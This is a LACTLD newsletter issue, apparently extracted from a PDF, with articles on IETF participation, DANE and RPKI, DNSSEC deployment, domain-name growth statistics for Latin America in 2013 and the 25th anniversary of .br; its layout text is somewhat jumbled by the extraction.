who want to submit their comments or topics of interest to the IETF. By Carlos Martínez Cagnazzo LACNIC Engineer of Investigation and Development. The regional approach is necessary as it helps to identify issues that affect lots of people but that are not being noticed by certain organizations or groups. We need to participate more. DOCUMENTS LACTLD report Domain names, evolutions and trends Latin America is close to nine million domain names and continues to grow at high rates in comparative terms with other regions. DANE and RPKI and their imminent impact Standards relating to DNS and IPv6 are the ones that have and will have the most impact on the Internet in the short term. In five years, what DANE (DNS -Based Authentication of Named Entities) and RPKI (Resource Public Key Infrastructure) work groups are doing will be relevant. DANE is this next twist of DNSSEC. We will have something extremely valuable being deployed on the Internet which is a directory service or a cryptographically signed database distributed worldwide. It is a most powerful tool with very interesting applications. DANE is also proposing incredibly attractive applications: basically how to express trust relationships in a more distributed and less centralized manner as we do today in the world of certificates. DANE DNSSEC and technology related to RPKI and origin validation are two sides of the same coin. Both try to offer cryptographic security to different pillars of the network: in one case, in terms of name resolution and, in the other, in terms of routing. While technologically different, they have a common goal. IETF work and the Internet of Things As widely known, online video and audio are some of the most important applications. In each video and audio application, there is a software component called codec, which is a little piece of software that is responsible for converting an analog signal into an online transmissible digital media. Codec historically have presented a big problem as they are closely related to patents. The most famous example is Mp3: for years if someone created a device or wrote a program that played Mp3 songs, he/ she would have to pay a license. There have been other cases of things that could not be done because there was no one to cover licensing costs. And this affects innovation. In this regard, IETF determined that the protocols it produces must be royalty free. They may be covered by a license but such must be for free. Globally, the total number of domain name registries is of approximately 265 million. The growth between April and August, 2013 represented a 2.4% increase (equivalent to a total of 6.2 million domain names). 45% refers to ccTLDs and 55% of the total market to gTLDs (Centr - DomainWire Edition 2 2013 ). In general terms, the proportion of domains that ccTLDs, at an overall global level, and gTLDs have is maintained. 16 • LACTLD In Latin America and the Caribbean Until August 2013, the total number of registered domain names of ccTLDs members of LACTLD was of 8,816,195, which represents a 6.33% decrease over the previous two months, when they reached 9.410.384 (May-June 2013). IETF standardized an audio codec and is trying to standardize a video one. I would dare to say that, since it is a common interest and legal security issue, most of the online content will be transferred to these codec. All this will have a social impact on the so called “Internet of Things”, which is based on an idea that is rather old but that, up until this day, could not be implemented because there were no hardware or protocols to do so. The purpose is to integrate the computing power in the objects that surround us. This requires a very large technology complex involving communication protocols, wireless protocols, network protocols, sensors, ways to transport that data and low power electronics. Every one of the necessary technology components is already emerging but it takes someone willing to invest to research and integrate everything. The list is also comprised of four ccTLDs from Asia and Pacific, 11 from Europe and two from North America. Among ccTLDs that recorded the highest growth rates in the four months from April to August, 2013, .br is fourth in terms of fastest growing (2.8 %), after .tk (13.9 %), . ru (4.8%) and .cn (3.5 %) (Centr, Domain Wire, 2 2013). It is important to note that the total number of active domain names in August 2013 has been significantly affected by a reduction in the .ar region. Such was due to a purge performed by the registry as a result of the implementation of a new policy and registry system. This led to the deletion of over 600,000 domains, in a zone that in June 2013 accounted for 2,977,581, which means a decrease of 22% in attempt to organize the records and to deter cyber-squatters. The impact of such action on the total LACTLD registries was considerable since .ar (together with .br, .ar, .co, .mx and .cl) is among the five records that lead the ranking in absolute numbers of domain names, representing over 93% of the region’s total. This also Source: Centr - DomainWire Edition 2 2013 The twenty more extensive ccTLDs, in terms of registered domain names, account for 81% of global ccTLD registrations, and include the three largest registries in Latin America and Caribbean: .br (Brazil), .ar (Argentina) and .co (Colombia). 17 • LACTLD Source: LACTLD domain name report LACTLD report Annual growth explains why this reduction had such a great effect on growth. Notwithstanding this change, net growth for the July-August period was of 0.95%, which represents, nonetheless, a reduction if compared with the previous two-month values. In Latin America and the Caribbean, ccTLD growth has been a constant feature for the period 2007-2013. In this region, the proportion of the penetration of domain names from country code Top Level Domains has been traditionally high and sustained when compared with generic Top Level Domains. Globally, the total number of domain name registries is of approximately 265 million. Source: Matthew Zook. As far as net growth is concerned, the global domain name market has steadily declined in recent years. However, the expansion of LACTLD region registries is still higher, on average, than that of the European ccTLDs and gTLDs (see Graphic 2). It should be noted that the denominator is different in these statistics (i.e., total gTLD registries exceed 110 million). After a brief growth spurt in early 2013, when the number of registries exceeded nine million members, combined bimonthly rates decreased in the last six months until August when they leveled. Despite this decline, in the last 12 months, LACTLD members have grown 2.5 % in total (10.5% if changes in .ar are excluded), compared with 5.9% for European ccTLDs and 3,7% for global gTLDs over the same period. The annual growth for the period from August 2012 to August 2013 was 2.5 % in absolute numbers. Over the past twelve months, average growth has been 14.2%. Again, it is worth noting that the significant alteration in August was mainly due to the changes in .ar. If such changes are not taken into account, the growth rate for that period would be over 10% in total numbers. Source: LACTLD domain name report Source: Matthew Zook. With respect to the behavior of the ccTLDs that grew the most in relative terms in the region, .ai experienced the largest increase for the period from July to August 2013: 6.1%. It is worth mentioning that this rate places it among the top five members of LACTLD for the last three year periods observed (mention which periods); followed by .do with 4.3%, .ec with 3.1%, .bo with 2.8% and .gt with 2.6 %. As usual, the diversity of ccTLDs in Latin America and the Caribbean shows a varied and heterogeneous behavior in aspects relating to the growth of their domain names. Again, the relevance of registry policies becomes evident, such as in the case of .ar, as far as trends and growth rates are concerned. During the last year the average growth of ccTLDs in the region was 14%. 18 • LACTLD Source: Matthew Zook. 19 • LACTLD DOCUMENTS The importance of DNSSEC the point in time that all registrars do handle DNSSEC. By Patrik Fältström Manager Research and Development at Netnod Domain Name System Security Extensions have a key role in solving security problems. Today many TLDs and organizations have deployed DNSSEC, but even more still ask the question whether it is worth the effort, whether DNSSEC actually helps with something. It does. It does not help against every security problem we have in the world and it does not solve all problems we have with DNS either. But it is one of many important pieces of the puzzle, and we need all of them to have the puzzle completed. trusting whoever gives us data to something called a chain of trust. One anchor the trust somewhere in the DNS hierarchy and by doing so one can derive the trust in all signed domain names below the so called trust anchor. It is the party validating the signatures on the responses that do decide where the trust anchor is and finally whether the potentially validated response is to be trusted or not. Operating DNSSEC It helps solving one, but only one, important piece, and that is to know that the data received comes from an authoritative source and that the data has not been changed during transport. These two things do of course depend on many involved parties doing the right thing (and we will look closer at that a bit later) but it also allows even higher number of parties to potentially do the wrong thing. And we can accept data being passed around by parties we do not trust. But lets start from the beginning. What do we need to make DNSSEC working? In fact, quite a large number of things. First of all, the root zone must be signed. It is since a number of years back and the public key for the root zone is published in a multitude of ways. With the help of that key, the root zone management (IANA, Department of Commerce of the USA and Verisign) can sign all public keys that TLDs pass to IANA. The signatures for those keys (the so called DS record) is then published in the root zone. So the second thing we need is for the TLD to be signed. Many of them are, but there are still a few that are not. Because DNSSEC changes the trust model we have. From “only” being Just like the root zone manager sign the key of the TLD, a TLD registry is So what does DNSSEC help with? to sign the keys for their child zones. That is in a registry/registrar system done by having the DNS operator for the zone pass the public key via the registrar to the registry so that a DS can be published and signed in the zone of the TLD. Today this is easy in the cases the registrar is also the DNS operator, but harder in the case the DNS operator is not a registrar. The reason why it is harder is that we do have the EPP protocol between registry and registrar, but we do not have a standardized way to communicate with the registrars. Registrars have web frontends, and some have APIs, but neither of the two are standardized. And we are far from The fourth piece is as described above that the manager of the zone that is to be signed signs it and passes the public key to the registrar. That can be done after the key(s) are generated, the private key is stored somewhere secure and the zone is signed. The signatures are pushed to the zone file itself and a new zone file is published. Of course this is an automated process, but not many provisioning tools can handle this correctly. Many DNS operators of today do still use low level tools like the dnssec zone signing tools that are distributed with the Bind package. Others use a bit more sophisticated tools (like OpenDNSSEC), but what we finally do see is complete dnssec management in provisioning software from a number of different vendors. There are still, as mentioned above, some issues with the communication hotspots for example) do filter DNS and makes it impossible to receive the DNSSEC key material (such as the signatures) and because of that running validation locally is very difficult. It sometimes work, but also fails sometimes. But having a signed zone in the authoritative DNS servers, and a chain of signed DNS key material to the root of the DNS is not enough. That only creates the chain needed to do the validation. We have to actually do the validation as well. The alternative is to send DNS queries as normal to the resolver that the access provider points at in the DHCP response one get when requesting access to the local network. This implies one have to both trust the DHCP response, the one doing the resolution of DNS queries and on top of that one have to hope the resolver is validating DNSSEC signed responses. The various relationships involved in DNSSEC It is the resolver operators that do the validation. This implies the validation can be made in the local computer by having a DNS resolver running locally. Unfortunately many Internet Access Providers (at hotels and internet Not all access providers do. In Sweden 97% of the DNS queries to local resolvers do result in validation, but that is because all larger access providers do validate queries. Hotels and other WiFi access points (where validation might be needed the most) are still not doing it. In other parts of the world the numbers are not even close to be so good. But lets say the responses are validated, and that whoever is doing the validation is succeeding calculating a chain of trust to one of the selected trust anchors, then we know much more about the response. And more specifically, we know that many of the attack vectors that exist against the namespace we use are cut off. Many others still exist, but they have to be fought with other means. There are still some issues with the communication with the registrars, but a new initiative in the IETF is looking at the whole EPP architecture. 20 • LACTLD with the registrars, but a new initiative in the IETF is looking at the whole EPP architecture. Mainly between registry and registrars, but if that is simplified there is hope also the dns operator – registrar communication end up being simplified as well. This is the reason why so many things must work before one can say that DNSSEC is deployed. But this is also why incremental steps to a full DNSSEC deployment are so important. For example that TLDs do sign their zones. Or that resolver operators do validate responses. Each and every step towards this solution makes the world better. 21 • LACTLD aniversary .br celebrates 25 years The latest statistics show that there are 3,267,353 .br domains registered. The Information and Coordination Center for Dot Br - Nic.br has been providing services to individuals and companies in Brazil for almost 25 years. They’re about to celebrate their 25th anniversary since, on April 18, 1989 the .br was assigned, even before the advent of the Internet in Brazil. Nic.br currently is a nonprofit organization that, since May 1995, has been relying on criteria established by the Internet Management Committee in Brazil, the agency responsible for the coordination and integration of Internet initiatives and services in the country. Its main purpose is to promote the Internet and its main duties are to: Nic.br is a nonprofit organization that, since May 1995, has been relying on criteria established by the Internet Steering Committee in Brazil. • register and maintain domain names using .br and distribute Autonomous System Numbers (ASN) and IPv4 and IPv6 in the country through Registro.br; • address and respond to security incidents that affect computer networks connected to the Internet in Brazil, activities which are in charge of CERT.br; • intervene in projects that support or improve infrastructure networks in the country, as the direct interconnection between networks (PPT.br) and the distribution of the Brazilian Network Time Protocol (NTP.br), initiatives that depend on CEPTRO.br; • produce and disseminate indicators, statistics and information on the strategic development of the Internet in Brazil, under the responsibility of CETIC.br; • promote studies and recommend technical and operational procedures, rules and standards for network and Internet service security, as well as for its increasing and appropriate use by society; • provide technical and operational support to LACNIC, the Internet Address Registry for Latin America and the Caribbean; and • be the home of the Brazilian W3C Office, which develops standards for the web. Initially used in the Brazilian academic network, .br rapidly expanded and, in September 2006, the first million of domains was registered. In February 2010, there were two million domains, and, in August 2012, three. The latest statistics, which include registries made until August 20, 2013, indicate that there are 3,267,353 registered domains. 94.5% of them correspond to generic domains, mainly .com.br. With the first TCP/IP connections in 1991, the structure was defined under .br. There is a closed second level with different subdomains that assist different segments of society. .br is a “thick” registry that holds direct relationship with registrants while it accepts that several providers assist with registries. Domain name can be registered from one to ten years. Besides, it provides an optional DNS service, at no charge, that includes DNSSEC. As for currently active working groups, as to know, Engineering and Network Operations and Network Security, their purpose is to support technical, administrative and operational recommendations and decisions by CGI.br. 22 • LACTLD 23 • LACTLD twitter.com/lactld facebook.com/LACTLD Address: Rbla Rep. de MĂŠxico 6125, CP 11400, Montevideo, Uruguay Tel.: + 598 2604 2222* (General Contact) Email: contacto@lactld.org
https://issuu.com/lactld/docs/lactld_03_ingles_baja
CC-MAIN-2017-13
refinedweb
6,936
51.58
Post your Comment inserting text into text file using java application inserting text into text file using java application Hi, I want to insert a text or string into a text file using java application Reading a text file in java reading text file in Java see the tutorial Read File in Java. Thanks...Reading a text file in java What is the code for Reading a text file in java? Thaks Hi, There are many classes in interfaces Java (Text To Speech) Java (Text To Speech) How can a selected part of a webpage be pronounced using java Swing text to speect - Java Beginners text to speect please i need a j2me library that convert text to speech on me please any one can help me my email is ahmed_akl2010@yahoo.coim text editor in java text editor in java hi friends, i want to do a mini project in programmers editor with syntax based coloring in java. i have no idea about this project and i dont know the java lang also.from now only i have to learn. please voice to text in java voice to text in java i'm doing my mini project and my objective is to create a pdf interface using netbeans and instead of text search option,i... to text conversion and so if i can convert speech to text then i can easily go java script text box java script text box hi, I created a button when i click... will click submit button the text should be submitted(it shows the value in alert). i also want the text box should generate in front of NEW button(next/prev To convert Speech to Text in java To convert Speech to Text in java package abc; import javax.speech.*; import javax.speech.recognition.*; import java.io.FileReader; import java.util.Locale; public class HelloWorld extends ResultAdapter { static Recognizer writing a text into text file at particular line number writing a text into text file at particular line number Hi, thanks for quick response, I want to insert text at some particular line number.. after line number four my text will display in text file using java program Text Editor with Syntax Highlighting Text Editor with Syntax Highlighting How to write a java program for text editor with syntax highlighting writing a text into text file at particular line number writing a text into text file at particular line number Hi, thanks for quick response, I want to insert text at some particular line number.. after line number four my text will display in text file using java program   new String(text) - Java Beginners (text): In this Case Java will create a new String object in normal (non-pool...new String(text) Please, what is the difference between this.text = text; and this.text = new String(text); in the example: public save text file - Java Beginners save text file hi i have just start programming in java.please guide me if i want to read a text file in java.then the text file is save in which directory Read text File Read text File Hi,How can I get line and keep in a String in Java Text change and click events Text change and click events Create user login form and apply textchange and click events in java voice to text converstion voice to text converstion how i can make a speech to text converstion program in java??? i have no idea about this project. so pls pls help me . thank you>> CALULATION IN TEXT FIELD CALULATION IN TEXT FIELD Suppose 3 text Field first amount ,second amount and third sum of these amount,this amount will appear when tab in next filed(i don't want use any type button) in java swing HOW? PLEASE HELP Adding a text file - Java Beginners Adding a text file Hello, I need a program that will search a text file of strings representing numbers of type int and will write the largest and the smallest numbers to the screen. The file contains nothing but strings Help in making a text formatter Help in making a text formatter I have a question on how to make a text formatter using Java. I attempted in doing so, but got a really low score... of the text field validation - Java Beginners text field validation hi How to validate allow only decimal number in text box in jsp? Hi Friend, Try the following code: function isDecimal(str){ if(isNaN(str) || str.indexOf(".")<0){ alert Scanning a word in a TEXT document...... Scanning a word in a TEXT document...... Hi Genius persons... I'm having many resumes in my FOLDER called HARISH in D:(colon) i want to scan... by searching the JAVA and .net words present in the files..if JAVA word is present means Text To speech exception - Java Beginners Text To speech exception Sir/Madam, I want to create a application for text to speech. I am using Sysnthesizer class of speech package but it return null.Can you help me to create that. i am facing error in synth.allocate how to update the text file? how to update the text file? my textfile with name list.txt: Rice... 150 .... ....20 lines. java code: import java.io.*; import java.util.*; class... in my text file, if the item i entered matches with item in text file.how can i Post your Comment
http://www.roseindia.net/discussion/22142-Rotate-Text-in-Java.html
CC-MAIN-2016-07
refinedweb
909
67.99
Introduction to Pandas Index Pandas Index is a permanent array executing an orchestrated, sliceable set. It is the fundamental thing that stores the center names for all pandas objects. The syntax is index.values. It returns an array which substitutes the index object of the array. Example: import pandas as pd idx = pd.Index([value 1, value 2, value 3, …value n]) print(idx) output = idx.values print(output) Here, we first import pandas as pd, and then we create an index called “idx” and type the string values and later print the index idx. Now, we use the idx.values to return the array back to the index object and finally print out the result. - Pandas index is also termed as pandas dataframe indexing where the data structure is two-dimensional meaning the data is arranged in rows and columns. - For the rows, the indexing that has to be used is the user’s choice and there will be a Default np.arrange(n) if no index has been used. How to Create and Work Index in Pandas? There is a structured template to create an index in Pandas Dataframe and that is, import pandas as pd data = { column one : [‘value one’, ‘value two’, ‘value three’,……], column two : [‘value one’, ‘value two’, value three’,……], column three : [‘value one’, ‘value two’, ‘value three’,……], ……. } df = pd.Dataframe (data, columns = [‘column one’, ‘column two’, ‘column three’,…], index = [‘A1’, ‘A2’, ‘A3’, …]) We should always remember that quotes should be used only for string values and not for integers or other numeric values. Example: import pandas as pd lux = {'Brand': ['Armani','Valentino','Prada','Gucci'], 'Price': [15000,16000,17000,18000] } df = pd.DataFrame(lux, columns = ['Brand','Price'], index=['p_1','p_2','p_3','p_4']) print (df) Output: From the above example, we have data about luxury brands called “lux”. We want to print the name and prices of these brands using Pandas indexing in Python Dataframe. Firstly, we import Pandas as pd, and then we start adding values to the index that is, we create a variable called lux and then add the brands and their prices which we want to be represented in the rows and columns format. Later, we define the dataframe as df and access the data of the luxury brands and add the index values of the products which are represented by p_1,p_2,p_3,p_4. Thus, the system numbers these index values starting from 0 and identify the rows and the columns and finally prints out the output. How to Multiple Index in Pandas? Multiple Indexes or multiline indexes are nothing but the tabulation of rows and columns in multiple lines. Here the indexes can be added, removed, and replaced. Example: import pandas as pd df = pd.DataFrame ({'Brand': ['Armani', 'Valentino', 'Prada', 'Gucci', 'Dolce Gabbana'], 'Price': [15000, 16000, 17000, 18000, 19000]}) df = df.set_index(['Brand', 'Price']) print(df) Output: In the above program, we add the same rows and columns in multiple lines and finally invoke the set index function which thus gives the output. How to Set and Reset Index in Pandas? Set and reset index in pandas as follows: 1. Set_index(): Pandas set_index() is an inbuilt pandas work that is used to set the List, Series or DataFrame as a record of a Data Frame. It sets the index in the DataFrame with the available columns. This command can basically replace or expand the existing index columns. Example: import pandas as pd df = pd.DataFrame ({'Brand': ['Armani', 'Valentino', 'Prada', 'Gucci', 'Dolce Gabbana'], 'Price': [15000, 16000, 17000, 18000, 19000]}) df = df.set_index('Brand') print(df) Output: Here, we import pandas and add the values to the indices. Later, we define the set_index function and make the brand name a separate column and finally assign it to the DataFrame. Hence, in the output as we can see, there is a separate column for ‘Brand’. 2. Reset_index(): We can use the reset command by using the syntax, df.reset_index(drop=True) Example: import pandas as pd lux = {'Brand': ['Armani', 'Valentino', 'Prada', 'Gucci', 'Dolce Gabbana'], 'Price': [15000, 16000, 17000, 18000, 19000] } df = pd.DataFrame(lux, columns= ['Brand', 'Price']) df = df.drop([0, 2]) df = df.reset_index(drop=True) print(df) Output: The first stage is to collect the data of various luxury brands and their prices. - The next step is to create a DataFrame using the Python code. Hence we get an output of all the index numbers that are assigned to all the values in a sequential format from 0 to 4. - The next stage is to create the drop function because without this function, it would be difficult for us to input a reset_index() command. Once, we implement this drop function with the respective index numbers, the indexes will not be sequential anymore and this command drops the 0th index value which is “Armani” and also the 2nd index value which is “Prada” and prints the rest of the output with its respective index numbers. - Finally, we add the reset_index command and the indexes become sequential and printed in the output. Conclusion Pandas in Python makes it extremely easy to work and play with data analysis concepts. Having the option to gaze upward and use works quick permits us to accomplish a specific stream when composing code. Pandas DataFrame rows and columns traits are useful when we need to process just explicit rows or columns. It is additionally valuable to get the mark data and print it for future investigating purposes. Recommended Articles This is a guide to Pandas Index. Here we also discuss the Introduction and how to create and work index in pandas? along with different examples and its code implementation. You may also have a look at the following articles to learn more –
https://www.educba.com/pandas-index/?source=leftnav
CC-MAIN-2021-21
refinedweb
954
63.19
Related Tutorial Understanding the GOPATH Introduction This article will walk you through understanding what the GOPATH is, how it works, and how to set it up. This is a crucial step for setting up a Go development environment, as well as understanding how Go finds, installs, and builds source files. In this article we will use GOPATH when referring to the concept of the folder structure we will be discussing. We will use $GOPATH to refer to the environment variable that Go uses to find the folder structure.. Setting the $GOPATH Environment Variable The $GOPATH environment variable lists places for Go to look for Go Workspaces. By default, Go assumes our GOPATH location is at $HOME/go, where $HOME is the root directory of our user account on our computer. We can change this by setting the $GOPATH environment variable. For further study, follow this tutorial on reading and setting environment variables in Linux. For more information on setting the $GOPATH variable, see the Go documentation. Furthermore, this series walks through installing Go and setting up a Go development environment. $GOPATH Is Not $GOROOT The $GOROOT is where Go’s code, compiler, and tooling lives — this is not our source code. The $GOROOT is usually something like /usr/local/go. Our $GOPATH is usually something like $HOME/go. While we don’t need to specifically set up the $GOROOT variable anymore, it is still referenced in older materials. Now, let’s discuss the structure of the Go Workspace. Anatomy of the Go Workspace. The $GOPATH/bin directory is where Go places binaries that go install compiles. Our operating system uses the $PATH environment variable to find binary applications that can execute without a full path. It is recommended to add this directory to our global $PATH variable. For example, if we don’t add $GOPATH/bin to $PATH to execute a program from there, we would need to run: - $GOPATH/bin/myapp When $GOPATH/bin is added to $PATH we can make the same call like such: - myapp The $GOPATH/pkg directory is where Go stores pre-compiled object files to speed up subsequent compiling of programs. Typically, most developers won’t need to access this directory. If you experience issues with compilation, you can safely delete this directory and Go will then rebuild it. The src directory is where all of our .go files, or source code, must be located. This shouldn’t be confused with the source code the Go tooling uses, which is located at the $GOROOT. As we write Go applications, packages, and libraries, we will place these files under $GOPATH/src/path/to/code. What Are Packages? Go code is organized in packages. A package represents all the files in a single directory on disk. One directory can contain only certain files from the same package. Packages are stored, with all user-written Go source files, under the $GOPATH/src directory. We can understand package resolution by importing different packages. If our code lives at $GOPATH/src/blue/red then its package name should be red. The import statement for the red package would be: import "blue/red" Packages that live in source code repositories, like GitHub and BitBucket, have the full location of the repository as part of their import path. For example, we would import the source code at using the following import path: import "github.com/gobuffalo/buffalo" Therefore, this source code would be in the following location on disk: $GOPATH/src/github.com/gobuffalo/buffalo Conclusion In this article we discussed the GOPATH as a set of folder’s that Go expects our source code to live within, as well as what those folders are, and what they contain. We discussed how to change that location from the default of $HOME/go to the user’s choice by setting the $GOPATH environment variable. Finally, we discussed how Go searches for packages within that folder structure. Introduced in Go 1.11, Go Modules aim to replace Go Workspaces and the GOPATH. While it is recommended to start using modules, some environments, such as corporate environments, may not be ready to use modules. The GOPATH is one of the trickier aspects of setting up Go, but once it is set up, we can usually forget about it.
https://www.digitalocean.com/community/tutorials/understanding-the-gopath
CC-MAIN-2020-24
refinedweb
714
64
Brute-force attack is an activity which involves repetitive attempts of trying many password combinations to break into a system that requires authentication. In this tutorial, you will learn how you can make a brute-force script in Python for SSH connection. Read Also: How to Make a Subdomain Scanner in Python. We'll be using paramiko library that provides us with an easy SSH client interface, let's install it: pip3 install paramiko colorama We're using colorama just for nice printing, nothing else. Open up a new Python file and import the required modules: import paramiko import socket import time from colorama import init, Fore Defining some colors we gonna use: # initialize colorama init() GREEN = Fore.GREEN RED = Fore.RED RESET = Fore.RESET BLUE = Fore.BLUE Now let's build a function that given hostname, username and password, it tells us whether the combination is correct: def is_ssh_open(hostname, username, password): # initialize SSH client client = paramiko.SSHClient() # add to know hosts client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(hostname=hostname, username=username, password=password, timeout=3) except socket.timeout: # this is when host is unreachable print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}") return False except paramiko.AuthenticationException: print(f"[!] Invalid credentials for {username}:{password}") return False except paramiko.SSHException: print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}") # sleep for a minute time.sleep(60) return is_ssh_open(hostname, username, password) else: # connection was established successfully print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}") return True A lot to cover here. First, we initialize our SSH Client using paramiko.SSHClient() class which is a high-level representation of a session with an SSH server. Second, we set the policy to use when connecting to servers without a known host key, we used paramiko.AutoAddPolicy() which is a policy for automatically adding the hostname and new host key to the local host keys, and saving it. Finally, we try to connect to the SSH server and authenticate to it using client.connect() method with a 3 seconds of timeout, this method raises: If none of the above exceptions were raised, then the connection is successfully established and the credentials are correct, we return True in this case. Since this is a command line script, we will parse arguments passed in the command line: if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.") parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.") parser.add_argument("-P", "--passlist", help="File that contain password list in each line.") parser.add_argument("-u", "--user", help="Host username.") # parse passed arguments args = parser.parse_args() host = args.host passlist = args.passlist user = args.user # read the file passlist = open(passlist).read().splitlines() # brute-force for password in passlist: if is_ssh_open(host, user, password): # if combo is valid, save it to a file open("credentials.txt", "w").write(f"{user}@{host}:{password}") break We basically parsed arguments to retrieve the hostname, username and password list file and then iterate over all the passwords in the wordlist, I ran this on my local SSH server, here is a screenshot: wordlist.txt is a nmap password list file that contain more than 5000 passwords, I've essentially grabbed it from Kali Linux OS under the path "/usr/share/wordlists/nmap.lst". DISCLAIMER: Test this with a server or a machine that you have permission to test on, otherwise it isn't our responsibility. Alright, we are basically done with this tutorial, see how you can extend this script to use multi-threading for fast brute forcing. If you wish to brute force FTP servers instead, check this tutorial. RELATED: How to Make a Port Scanner in Python using Socket Library. Happy Brute-forcing ♥View Full Code
https://www.thepythoncode.com/article/brute-force-ssh-servers-using-paramiko-in-python
CC-MAIN-2020-16
refinedweb
633
58.58
Yep, sounds good. My interest for it dropped once iOS7 made "keyboard-shrinks-view" the default (much better for apps). On Mon, Jun 23, 2014 at 5:31 PM, Shazron <shazron@gmail.com> wrote: > This plugin has been moved to the org.apache.cordova.labs namespace so > it doesn't affect our plugin releases. > > I feel that this plugin is better off in the hands of 3rd party devs > like ionic: > > I personally am not going to be maintaining it anymore primarily > because of the testing complexity (see manual tests in mobile-spec) > and I prefer not to muck around with the keyboard native views (which > is extremely hacky). Also because of iOS 8 support for custom > keyboards. >
http://mail-archives.apache.org/mod_mbox/cordova-dev/201406.mbox/%3CCABiQX1WBCmDStcj189r=g8PRQR7eg0MvN6_MTf-L7LWm1j7EPg@mail.gmail.com%3E
CC-MAIN-2018-30
refinedweb
118
64.3
16 replies on 2 pages. Most recent reply: Dec 19, 2007 1:21 AM by Howard Lovatt First up a quick critique of the proposals. The idea is that if you use a static import then you can call an imported static method using the dot notation used currently for instance methods, e.g.: import static java.util.Collections.*; ... list.sort(); Whereas currently you would have to write: sort( list ); It is certainly nice that using the proposal you gain some readability because methods read left to right, for example consider chaining methods: list.synchronizedList().sort(); Which reads better than: sort( synchronizedList( list ) ); On the downside the proposal implies that sort is part of List and that it is dynamically dispatched. But suppose you wanted a different sort that was more optimum for a ConcurrentLinkedQueue, that was also statically imported: sort List ConcurrentLinkedQueue import static java.util.Collections.*; import static MySortMethod.*; // Includes a sort method for ConcurrentLinkedQueue ... List list = new ConcurrentLinkedQueue(); list.sort(); There are two sort methods, one associated with List and one with ConcurrentLinkedQueue. With normal dynamic dispatch, as implied by the dot notation, you would expect sort( ConcurrentLinkedQueue ) to be called. But it won't be; because the dispatch is static, therefore sort( List ) is called. sort( ConcurrentLinkedQueue ) sort( List ) This second proposal is that if a method returns void it is assumed to return its own receiver (similar to returning this but retaining the type of the receiver which might be a sub-type of this), e.g.: void this list.add( 1, "A" ).add( 2, "B" ); Currently you would write: list.add( 1, "A" ); list.add( 2, "B" ); The proposal certainly reduces repetition. But it has a limited use case, e.g. add( int, Object ) returns void but add( Object ) returns boolean and therefore can't be used. add( int, Object ) add( Object ) boolean One of the main use cases for this proposal is the Builder pattern in conjunction with settable properties, e.g.: Home home = new Builder().setWindows( windows ).setDoors( doors ).makeHome(); I will come back to this builder example below, the key point is that the result of makeHome is a Home not a Builder. makeHome Builder I would like to propose a superior alternative to both the above proposals. Pascal and other languages have a with construct that saves repeating the receiver of the call. Similarly a with construct but using an operator could be added to Java. The examples given above for both Extension Methods and Chained Invocation can be expressed as a with clause thus demonstrating that both proposals can be unified. list -> synchronizedList() -> sort(); list -> { add( 1, "A" ); add( 2, "B" ); }; Home home = new Builder() -> { setWindows( windows ); setDoors( doors ); makeHome(); }; The -> operator supplies the first argument to any method. For instance methods the first argument is the receiver (hidden this). If -> is applied to a block then the object on the left of -> is supplied to all the methods and the value of -> is the value of the last method (values from intermediate methods are discarded). -> Using a different operator, ->, has the advantage of not implying dynamic dispatch and since the feature works with all methods: instance methods, statically imported functions, and non-statically imported functions it has a wide use case. What do fellow Artima's think; are Extension Methods, Chained Invocations, or with clauses worth adding? Home home = new Builder(){{ setWindows( windows ); setDoors( doors );}}.makeHome(); list -> sort(); sort(list); |. :. list |. sort(); // in your syntax: list -> sort()list|.sort(); // looks more like list.sort() (i.e. normal method invocationlist |. Collections.sort(); // 'pipe' it to Collections#sort(List)list |.synchronizedList() |.sort(); . list->synchronizedList()->sort(); int index = list->{ sort(); binarySearch( key ); }; list.{ add( 1, "A" ); add( 2, "B" ); }; Home home = new Builder().{ setWindows( windows ); setDoors( doors ); makeHome(); }; foo |. bar(); // versions axel_1 and axel_2// axel_1 could be read as: pipe list to the result of FooBar#sort()foo |. FooBar.bar(); // version axel_1//while axel_2 pipes to FooBar and then there is some kind of invocationfoo |FooBar. bar(); // version axel_2foo | org.stuff.FooBar .bar(); // version axel_2foo |. org.stuff.FooBar#bar(); // version axel_3, 'method literal syntax' list -> filter( test1 ) -> filter( test2 ) -> sort(); sort( filter( filter( list, test1 ), test2 ) );
http://www.artima.com/forums/flat.jsp?forum=106&thread=220783
CC-MAIN-2013-20
refinedweb
695
57.37
Some classes like Integer Integer(1) #=> 1 initialize Integer is a Kernel method. In fact, it is defined as Kernel.Integer. You can simply create a new method that acts as initializer for your custom class: class Foo def initialize(arg) @arg = arg end end def Foo(arg) Foo.new(arg) end Foo("hello") # => #<Foo:0x007fa7140a0e20 @ However, you should avoid to pollute the main namespace with such methods. Integer (and a few others) exists because the Integer class has no initializer. Integer.new(1) # => NoMethodError: undefined method `new' for Integer:Class Integer can be considered a factory method: it attempts to convert the input into an Integer, and returns the most appropriate concrete class: Integer(1).class # => Fixnum Integer(1000 ** 1000).class # => Bignum Unless you have a real reason to create a similar initializer, I'd just avoid it. You can easily create static methods attached to your class that converts the input into an instance.
https://codedump.io/share/XXGADLkNiSow/1/how-to-define-class-name-method-like-integer-and-when-should-i-use-it
CC-MAIN-2017-26
refinedweb
156
55.64
